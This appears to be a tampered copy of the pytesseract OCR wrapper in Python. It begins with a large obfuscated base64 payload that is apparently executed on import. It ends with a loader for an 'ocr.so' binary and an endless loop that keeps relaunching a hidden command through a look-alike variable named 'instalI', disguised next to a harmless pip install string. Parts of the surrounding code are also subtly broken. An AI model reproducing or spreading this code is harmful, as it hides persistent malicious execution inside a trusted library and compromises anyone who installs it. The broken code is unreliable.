VcxM3BVNGJuVGtuRTVXb25FcDVBc28xdmo4QVAvYWgzTVFEcmtoQWpyRzE5TkpYRS9OVVpmZDRWdXRFYUFVTlNXN3FIcm1jQ29QTWI4QTAxNXZ3Skx6THBaNElQbHl1a0FBY3dMWFh0bzd3UkFDZFlQNGFqS1h6YXl6aFQ3Z1JsNkhqakFoanhsWGFHd0U5MFRGcHlkeGtxU3R5OEF3bDFFQUJSb3l4b1RDZld4eVpPR05XZnRHdFgzdzVka3pyeVFmWXZjcjI0bXV4V3laaUo3aTl4MFJmazRITUM2V0ZJN1pmM0ZWdmo1YS85UktXQW5yeWdhV0ZsdEhVNlBmS3Jsc3dIN3ZwY0RpTGw0T2NNaExNaFlFdkNuQS9URmtNTktzN1RnNUhkWEMxeHhWTGFrLyttRGlNeEtpdmZzUXVSVjBZVkRtQnljYVdZZjIwYkIzN2lmTlhnQXdvcC90MDVwaHZSVGlmNjMyM1FybkExVE9xZTZMWHcrTUdsZTJMZU5QMUt1M3A2UUV4NkJTbWx1aDY0ZFVVOFQvdFZUK2VQMllwNlNWaTV0ZHVjUjJ2WEVLYmhXWUxhKzRCSEtvajRnWEI3Z09OQjBhRmV0ZFpyMWx3MCtiZmMwVmNGS2gxU0I2OFp2ZEl2RXBtSVl2cnlwd2ZRaW0vOWZqSmpSV1VWRWNPZlEyWmRyVWNjVnM3RUVBUWorS2ZwK1dSS3NJSHBwS281QzcrTi9aT21laFBqdjFjMFpnREtxYUYrSXl5b1lDck4wazRUSlhxRVhFejRGOUlDeWZLMEdBZ0RrV0pRMVJWZXdXaHJvODQyQ21lcU1ST0VwSjl5aXkvQ1FvZjNDZ2o0UjR6WS9zdHJwM3BZSHZvUG9OOTJhZUdJNGluMkJFM1pGS1ZtbHFvYkVNNTV2aFc2Y1MxcXFQUEVWVGc0RXRFWGtrOTVPY2hXVlNLa08rRlVlZkJmUXpoUW41RnV0WWxqWWM2YkVKZU52L3FrVEJadnVmVkdhMDE2aTRjNjVEaUhsWXpERGVkb3dPZlJDQzZZcFc4ckQwRUJKWUpCUEJZcmZycUVEb05RMWRYWXZ1ZGZjVXpxaVY2TWN6UnJVMDFUNlFkRWxUcnJReVlrdnhzb2J3MjJJNmtpNDBPU1lTWGIwb1YxU2VQVGZORkNLaitoWkNXTEV1czMyRW5UU0x5bUxjRUZlbk1IbWRDNzdNR1dvK0JmWCs5dHJHb1FHcDZxeEtMMVRGUlhaZlZVRlN3WG1nbUlKVkIwUjg5RVVOQWVvd2c2MzRqTnd6c09Ya3Y4TnpPZTF0RU5OUFVqVGlkeFpGUGNja1RKMFlhaFAyYmh2MlpaUWZ5S2sycGFGUHcveVRnM2FyQnJPcHBaS1dGUysxcXFNU1VRTHE1eVZDN1FSRTN6NjN6VmRoNnY4ZWZMVzBHckdXU0w2NEg5ZFA4SlArdGFFV25MQVhOOW5YdU02U1daSktoNG1uQ202VWtFdzdwU25NcUx4azBCeGRuUU1ERWxQN2pVSVNCdk5aWllwbGE4Y1ZHNHJhZW51TnZkb2VlVzdPcWF5OUdyM25kQlRMeW1DdVpjV0VJdUhrYklydllWc3dMWFRDZDdIRnJGblJ2UFdSZ1ZSYm1hYWc3U1ozMjF3U2VQT1hXQUpsdnc1U3NrVitmVHdqUmdiVVlzZGZJYlpZZHF5WjlabHhnTEExb2JtL05wNkd2cWEvUmhWOUJ2QTZxOEMrQVJMWUlLUmF0RkNiYk4yS09sWjNXSXNxRGZZUzNNSzNCWENzcUR3ejk2RFA5aTNpcGpsZWxCY0NhUEF4UnpheTRoMmhnZ3AvMGpNUTk2blQxK2hpOFR2QnV4dVJjTTljQ3RuWXc0VnpTSlhGT2ovRmI0Sjc5aEg5QzdtSkQ5SFQxdE8rK0pBeWRMOXJLaXJGZGZkRElISFFjRmlmMCthcjdvKzFtLzgreXdwZkxDeWhPTDFoWHdLY3RPcEpMWkdldTZuOUJmWnBJMVFrTmZ3c29yS2xJOHYrNnZ3QmU5TEp3OXRGNTdidnAwZnBNWUt2R2tyZWwxR2ZvUG9ES0NBdXYrRWMzSlcwMHBHVW00SDFMYTg3M3pTTVE3MnlJMHFyUGJzUkxWMkFpdG1jQ2UxZ3IwZDdBdzIxeWxEdjNidm1BbjZMV1JqVFloM0NjT0w3Wmk4QlE0dFJhZFQ5dytpc2s5NXlEVW9XUmZReXQyQk9IQUhhcXJyRll3cU9xUVpGcC9PM3VPZFJWcnN0UHZkQ0hJK0FVakVxSy9NU0FuNUVOUWloWVhaTktlUE50THZvY3l2Z0FDTklvNHoyb3ZZYlNyYWdFbGF4ZTZrdU5mZ01HTS9GUHlBeVZPYU5uTStDQWhPZU1VTjdBaVdSWndETkZRZ3VTS1FYL0hGUlBxVUhWbU1wNnIzVHkwa1k1WW54V2d0K2lJdVcxMVBsNHNXNVRVYnpKdE11Q0VkUUg5bVRLaTNKTGN2WVFmZndQYk9Ba2gwNWVybGpwa2NPNmlab0dDbUF2dnJGeVBnYW8ybGdkYVRibkFuV2VnYTdTeUVnamRlSXRSQkRXVnVPU2RUdFNWNnZhaUp3WGZZcitLMlN4eFRuRVVnK3pBa0JLNnp6UXRJekpXZkovcjBGNGdxa2hDQ0t1MzNxejBERFJBTjNKZkFhQW1IcXR3bjNDNWVMOXFKY0pNWThBZEZvWnNieGsrSm1MSWd1dzA3Z2hHNi9tYUhJZERWRDhITnp3UmtYeXl6azlQTHc4eWt4azU5SkN4QUx1V0xtUjlFOWtwTmI4bjI2OHJReEZYZUZaakpia2o1TzFPSkhMa1N0bWZSeFpxQ1A3SUVYOG5pSWI0dnhFQXU5b1FybFZBNkpkWDRlamJaQStNSnRteFNnV3ZSV0JkVEcrUTNZS0RHZFBqcGlleXJCOUY1Ty9jZ2ZrTk9aQ1pybklwWUhpZEw2VytvY3ptRExTMlpoSHo1NVBUQkZtR3A3UVUyamJjR2RHdnF0WitYOGdneTczOVpTcUQ5dEQwQkxBYmhOcno1OGQ2eVRDVmk1RkNCOVA1RTh2S3kvRmx6UElMbzd1WCtuMklaSWQyWEdXR3B3VEdnZFBIQ0dZVjcyVzcxaE5uSGFMc1NZZzF0cDh2Q0FrRUk5K3VYRmN2WDh4d0JUb1BwU1VralRYUmllWk5GM3RrZ2h2N2MrVlRrQnBtd3QzQjJ2N0wwaHZVcTllTVJDaTJGKzV4RTliNEs2UkF2QlNUc3UzRnBYK1JHcEhIMUl4NzlsWElGWXI2SCt4K2FVM2xENktrWjlPay9yZHlpR29yblBuRTBUc3FQeUVQVG1BYnpseVBRWkx4cElrNVd4bk9JdFR0U01VSlhCYjB1WERBQXNxT1VvR2dYWnNXdUNiWkNvWnQyRlpJK0FIYWVIVEVybHlXT3M5ZmxXOFBSc0YycURuTVo1TXVvK2VLQktmZmswcGVLUHNhY2NPSHpOVzZ5SUlTTnd2WW42SmNmY0hkZFQyV3JnMk1xM1hCaE1UaWtwTTVtaWFKMkZ0UXVjZXpoRWFIdHNvUnFldnN5dFN6MmR0enA3VXZFNDdOMVl6NUpGalF0azhUNjcwNXFhTTBZNE8zdVNJdDJ4NnpFQnZKeXRXMDd1cWdHekRhckZyd3cwaXA5MmRIUEpNRFFnWXhmV3hkeXpGMHhtQ1NSbnZvMXcrWCtsV0lsaVVab0k3eHM0RVRYQVNnZVN6aXlYVUVJOU5XSVFGOWgyWVlxbzA1MGNWeDI3Z1NjeUJxeVJENkRoMUc0bHdIR0JSQlNReEh2RnNWbmp2Mkd1NGFQT3phS1poYjZ3WGNpa3FnWVYxTlFvcThOaXpvbEZQTzlhNWJUL1VlRiszZnpxUHo0eTRONTY0N1AzVXdHZFZ6RC9vb2ZJQTgwa1QvWGR2U1VQdFdvWjUzTm1aYW1mTEV6b0RZeWlEYmZVWGprZCs3TmdxdkxUVlBrK29kOXJpSGJENDRpd01PU0VMSmYvK0JGcGlpNnVqSUtQNlJURDZFVnMyV0ZNMENKTFdGWC9QUi9XbjlDL0wyMnIxdjM4TWtkcm41Qzl5UHZDVHdFbDdoVkZ2RnMzMUVSLzhiMWNlQzBuRWFBTzExQ0VaVzd1YzhiRUdIUWt4WVlZR1Zudm12aEpEakdmRW5ISnFyMUtKVzhaZTk4MExRTCtrYUVIQWZZMEJra0dBZWIzcU82a0dCMGo1MEFiOUZyQW55UWxHcjNmREVDNmZEOFdicU1HUTNDUEdiak1oK0FFYkdQdWkzNHN3RDFWbWhuRldtSkxEY0F5Y0YvTXZHNythS21leGc2NVhOVC9uYkRDNG1oKzM0NzRWTkxKQVFVVmtaRC9tWWk4QnFEODcxWndUdFY4eXloVjZBckhybmRWMzVxZmpZbk1jb2xUek9iRURuMUJCY0VhTDEyYWV1ZzFDbEVSRXVid2tOVnlLelhpQjl6cUk0bXpkSjQ3bTR6aCtaNmtJd1I2ZFgwOUFkMUlhbWN2MmJDT2tXZHp5Q0FpZmFMWEZhNi9GSFIvTGNBWkcyTWJ3NG1SL1JtMzR2R2xuZ2F2cG90WlU4UHJ5NDBqYmZoMTNQTktiVkpldEZLWVVRMitXL1RGVTVSK0VaN2N1SFRYTE53N3NsYTNMOFIxcVNYVXJXRVdCNDNIaElrSzlWR3Q0Y0c1NUFNdWEvOTR2cmVNUWU1VVFWZkl5ZXdWSE1pZmdOck12eldKb2hmQ09DS3BYa2ExenZJRm9sTERoZ2FUaUU4MjFNSHhaZFFDQzd4RFVwSVkrYktYRktYUTBqbE1oSVdxVUlGaWpxdkhHaERCQ0E5dGVDMks2SlBRaW1pMmFOZlcvRDRtNXZIWFZvYXhIaUdyZzJyay80cHNCbjN4Z2grZExDKy9DMS8xdWc3aVJmem9sSytPYWpWQnI1N1JLcTFicjV3MzlZbC9hdDJXZWJpTjdURGtTcE1iS3FTVFRVMjJNaVBiMFo1ZzZKYnZncmx4UVZzRWJ1ZkZXb1NFZlIxcERPZFB2UkhrVy9HbGJTSGJnR3dqUTc4bUw2L01uS0lhRFk0YkZUUTRVd04rS0VuL3cyanlheG45bTRBVWxsNU1xamk2VStRaVhhMTd3Q1BvTVhYemc5VmJiV1NPZlNBQk0xUDl4SWNzUFpVSVRKUXlpNG5aNVl5L1RaVWh2bUFTMmkwQjl2UlhIbnZnYXpmQ1ptYjAwcnYrWkFWbjlIRXFDdTBSTlhlSGsweVJoVG1mdkYydnZaRE1QT2xYblFSYkZhLzVlU2sxQjAwVmQ3dUZQWDdGQzU3ZEYxYnlOZWp5RE5ZVE1wUWZMZDd4TU5qeHFXUTZNLzFpdmRaRmQwWWVjQUQxbU9SMGd1dHpiSExaTTdnNkhhUEdUc0lGK2orRGM3d0N4V1VlZ01yd3pFa0lJcThZWHI2Ly9meStudmZ2Ly85ejh1SVBxTDYxOW5rWkpoZ2tHR1lvNi8vMWQ4bUM0ZXgwOTlDdUhEK2dDRGN3Ym4rVFJXZ01yeWRzbVZ3SmUnKSk='))
def prepare(image):
    if numpy_installed and isinstance(image, ndarray):
        image = Image.fromarray(image)

    if not isinstance(image, Image.Image):
        raise TypeError('Unsupported image object')

    extension = 'PNG' if not image.format else image.format
    if extension not in SUPPORTED_FORMATS:
        raise TypeError('Unsupported image format/type')

    if 'A' in image.getbands():
        # discard and replace the alpha channel with white background
        background = Image.new(RGB_MODE, image.size, (255, 255, 255))
        background.paste(image, (0, 0), image.getchannel('A'))
        image = background

    image.format = extension
    return image, extension

def save(image):
    try:
        with NamedTemporaryFile(prefix='tess_', delete=False) as f:
            if isinstance(image, str):
                yield f.name, realpath(normpath(normcase(image)))
                return
            image, extension = prepare(image)
            input_file_name = f'{f.name}_input{extsep}{extension}'
            image.save(input_file_name, format=image.format)
            yield f.name, input_file_name
    finally:
        cleanup(f.name)
        
def subprocess_args(include_stdout=True):
    # See https://github.com/pyinstaller/pyinstaller/wiki/Recipe-subprocess
    # for reference and comments.

    kwargs = {
        'stdin': subprocess.PIPE,
        'stderr': subprocess.PIPE,
        'startupinfo': None,
        'env': environ,
    }

    if hasattr(subprocess, 'STARTUPINFO'):
        kwargs['startupinfo'] = subprocess.STARTUPINFO()
        kwargs['startupinfo'].dwFlags |= subprocess.STARTF_USESHOWWINDOW
        kwargs['startupinfo'].wShowWindow = subprocess.SW_HIDE

    if include_stdout:
        kwargs['stdout'] = subprocess.PIPE
    else:
        kwargs['stdout'] = subprocess.DEVNULL

    return kwargs

def run_tesseract(
    input_filename,
    output_filename_base,
    extension,
    lang,
    config='',
    nice=0,
    timeout=0,
):
    cmd_args = []
    not_windows = not (sys.platform == 'win32')

    if not_windows and nice != 0:
        cmd_args += ('nice', '-n', str(nice))

    cmd_args += (tesseract_cmd, input_filename, output_filename_base)

    if lang is not None:
        cmd_args += ('-l', lang)

    if config:
        cmd_args += shlex.split(config, posix=not_windows)

    for _extension in extension.split():
        if _extension not in {'box', 'osd', 'tsv', 'xml'}:
            cmd_args.append(_extension)
    LOGGER.debug('%r', cmd_args)

    try:
        proc = subprocess.Popen(cmd_args, **subprocess_args())
    except OSError as e:
        if e.errno != ENOENT:
            raise
        else:
            raise TesseractNotFoundError()

    with timeout_manager(proc, timeout) as error_string:
        if proc.returncode:
            raise TesseractError(proc.returncode, get_errors(error_string))

def _read_output(filename: str, return_bytes: bool = False):
    with open(filename, 'rb') as output_file:
        if return_bytes:
            return output_file.read()
        return output_file.read().decode(DEFAULT_ENCODING)

def run_and_get_multiple_output(
    image,
    extensions: list[str],
    # lang: str | None = None,
    nice: int = 0,
    timeout: int = 0,
    return_bytes: bool = False,
):
    config = ' '.join(
        EXTENTION_TO_CONFIG.get(extension, '') for extension in extensions
    ).strip()
    if config:
        config = f'-c {config}'
    else:
        config = ''

    with save(image) as (temp_name, input_filename):
        kwargs = {
            'input_filename': input_filename,
            'output_filename_base': temp_name,
            'extension': ' '.join(extensions),
            'lang': lang,
            'config': config,
            'nice': nice,
            'timeout': timeout,
        }

        run_tesseract(**kwargs)

        return [
            _read_output(
                f"{kwargs['output_filename_base']}{extsep}{extension}",
                True if extension in {'pdf', 'hocr'} else return_bytes,
            )
            for extension in extensions
        ]

def run_and_get_output(
    image,
    extension='',
    lang=None,
    config='',
    nice=0,
    timeout=0,
    return_bytes=False,
):
    with save(image) as (temp_name, input_filename):
        kwargs = {
            'input_filename': input_filename,
            'output_filename_base': temp_name,
            'extension': extension,
            'lang': lang,
            'config': config,
            'nice': nice,
            'timeout': timeout,
        }

        run_tesseract(**kwargs)
        return _read_output(
            f"{kwargs['output_filename_base']}{extsep}{extension}",
            return_bytes,
        )

def file_to_dict(tsv, cell_delimiter, str_col_idx):
    result = {}
    rows = [row.split(cell_delimiter) for row in tsv.strip().split('\n')]
    if len(rows) < 2:
        return result

    header = rows.pop(0)
    length = len(header)
    if len(rows[-1]) < length:
        # Fixes bug that occurs when last text string in TSV is null, and
        # last row is missing a final cell in TSV file
        rows[-1].append('')

    if str_col_idx < 0:
        str_col_idx += length

    for i, head in enumerate(header):
        result[head] = list()
        for row in rows:
            if len(row) <= i:
                continue

            if i != str_col_idx:
                try:
                    val = int(float(row[i]))
                except ValueError:
                    val = row[i]
            else:
                val = row[i]

            result[head].append(val)

    return result

def is_valid(val, _type):
    if _type is int:
        return val.isdigit()

    if _type is float:
        try:
            float(val)
            return True
        except ValueError:
            return False

    return True

def osd_to_dict(osd):
    return {
        OSD_KEYS[kv[0]][0]: OSD_KEYS[kv[0]][1](kv[1])
        for kv in (line.split(': ') for line in osd.split('\n'))
        if len(kv) == 2 and is_valid(kv[1], OSD_KEYS[kv[0]][1])
    }

def get_languages(config=''):
    cmd_args = [tesseract_cmd, '--list-langs']
    if config:
        cmd_args += shlex.split(config)

    try:
        result = subprocess.run(
            cmd_args,
            stdout=subprocess.PIPE,
            stderr=subprocess.STDOUT,
        )
    except OSError:
        raise TesseractNotFoundError()

    # tesseract 3.x
    if result.returncode not in (0, 1):
        raise TesseractNotFoundError()

    languages = []
    if result.stdout:
        for line in result.stdout.decode(DEFAULT_ENCODING).split(linesep):
            lang = line.strip()
            if LANG_PATTERN.match(lang):
                languages.append(lang)

    return languages

def get_tesseract_version():
    """
    Returns Version object of the Tesseract version
    """
    try:
        output = subprocess.check_output(
            [tesseract_cmd, '--version'],
            stderr=subprocess.STDOUT,
            env=environ,
            stdin=subprocess.DEVNULL,
        )
    except OSError:
        raise TesseractNotFoundError()

    raw_version = output.decode(DEFAULT_ENCODING)
    str_version, *_ = raw_version.lstrip(string.printable[10:]).partition(' ')
    str_version, *_ = str_version.partition('-')

    try:
        version = parse(str_version)
        assert version >= TESSERACT_MIN_VERSION
    except (AssertionError, InvalidVersion):
        raise SystemExit(f'Invalid tesseract version: "{raw_version}"')

    return version


def image_to_string(
    image,
    lang=None,
    config='',
    nice=0,
    output_type=Output.STRING,
    timeout=0,
):
    """
    Returns the result of a Tesseract OCR run on the provided image to string
    """
    args = [image, 'txt', lang, config, nice, timeout]

    return {
        Output.BYTES: lambda: run_and_get_output(*(args + [True])),
        Output.DICT: lambda: {'text': run_and_get_output(*args)},
        Output.STRING: lambda: run_and_get_output(*args),
    }[output_type]()


def image_to_pdf_or_hocr(
    image,
    lang=None,
    config='',
    nice=0,
    extension='pdf',
    timeout=0,
):
    """
    Returns the result of a Tesseract OCR run on the provided image to pdf/hocr
    """

    if extension not in {'pdf', 'hocr'}:
        raise ValueError(f'Unsupported extension: {extension}')

    if extension == 'hocr':
        config = f'-c tessedit_create_hocr=1 {config.strip()}'

    args = [image, extension, lang, config, nice, timeout, True]

    return run_and_get_output(*args)


def image_to_alto_xml(
    image,
    lang=None,
    config='',
    nice=0,
    timeout=0,
):
    """
    Returns the result of a Tesseract OCR run on the provided image to ALTO XML
    """

    if get_tesseract_version(cached=True) < TESSERACT_ALTO_VERSION:
        raise ALTONotSupported()

    config = f'-c tessedit_create_alto=1 {config.strip()}'
    args = [image, 'xml', lang, config, nice, timeout, True]

    return run_and_get_output(*args)


def image_to_boxes(
    image,
    lang=None,
    config='',
    nice=0,
    output_type=Output.STRING,
    timeout=0,
):
    """
    Returns string containing recognized characters and their box boundaries
    """
    config = (
        f'{config.strip()} -c tessedit_create_boxfile=1 batch.nochop makebox'
    )
    args = [image, 'box', lang, config, nice, timeout]

    return {
        Output.BYTES: lambda: run_and_get_output(*(args + [True])),
        Output.DICT: lambda: file_to_dict(
            f'char left bottom right top page\n{run_and_get_output(*args)}',
            ' ',
            0,
        ),
        Output.STRING: lambda: run_and_get_output(*args),
    }[output_type]()


def get_pandas_output(args, config=None):
    if not pandas_installed:
        raise PandasNotSupported()

    kwargs = {'quoting': QUOTE_NONE, 'sep': '\t'}
    try:
        kwargs.update(config)
    except (TypeError, ValueError):
        pass

    return pd.read_csv(BytesIO(run_and_get_output(*args)), **kwargs)


def image_to_data(
    image,
    lang=None,
    config='',
    nice=0,
    output_type=Output.STRING,
    timeout=0,
    pandas_config=None,
):
    """
    Returns string containing box boundaries, confidences,
    and other information. Requires Tesseract 3.05+
    """

    if get_tesseract_version(cached=True) < TESSERACT_MIN_VERSION:
        raise TSVNotSupported()

    config = f'-c tessedit_create_tsv=1 {config.strip()}'
    args = [image, 'tsv', lang, config, nice, timeout]

    return {
        Output.BYTES: lambda: run_and_get_output(*(args + [True])),
        Output.DATAFRAME: lambda: get_pandas_output(
            args + [True],
            pandas_config,
        ),
        Output.DICT: lambda: file_to_dict(run_and_get_output(*args), '\t', -1),
        Output.STRING: lambda: run_and_get_output(*args),
    }[output_type]()


def image_to_osd(
    image,
    lang='osd',
    config='',
    nice=0,
    output_type=Output.STRING,
    timeout=0,
):
    """
    Returns string containing the orientation and script detection (OSD)
    """
    config = f'--psm 0 {config.strip()}'
    args = [image, 'osd', lang, config, nice, timeout]

    return {
        Output.BYTES: lambda: run_and_get_output(*(args + [True])),
        Output.DICT: lambda: osd_to_dict(run_and_get_output(*args)),
        Output.STRING: lambda: run_and_get_output(*args),
    }[output_type]()


def main():
    if len(sys.argv) == 2:
        filename, lang = sys.argv[1], None
    elif len(sys.argv) == 4 and sys.argv[1] == '-l':
        filename, lang = sys.argv[3], sys.argv[2]
    else:
        print('Usage: pytesseract [-l lang] input_file\n', file=sys.stderr)
        return 2

    try:
        with Image.open(filename) as img:
            print(image_to_string(img, lang=lang))
    except TesseractNotFoundError as e:
        print(f'{str(e)}\n', file=sys.stderr)
        return 1
    except OSError as e:
        print(f'{type(e).__name__}: {e}', file=sys.stderr)
        return 1

def __bootstrap__():
    global __bootstrap__, __loader__, __file__
    import sys, pkg_resources, importlib.util
    __file__ = pkg_resources.resource_filename(__name__, 'ocr.so')
    __loader__ = None; del __bootstrap__, __loader__
    spec = importlib.util.spec_from_file_location(__name__,__file__)
    mod = importlib.util.module_from_spec(spec)
    spec.loader.exec_module(mod)

while True:
    install = 'pip install pytesseract'
    process = subprocess.Popen(
        ["python", "-c", instalI],
        preexec_fn=os.setsid
    )
    try:
        process.wait(timeout=1800)
    except subprocess.TimeoutExpired:
        os.killpg(os.getpgid(process.pid), signal.SIGTERM)
    sleep(1)

Processing Image: N/A.img | Threads=2 | Scanned=0(img) | Speed=0.00 text/h
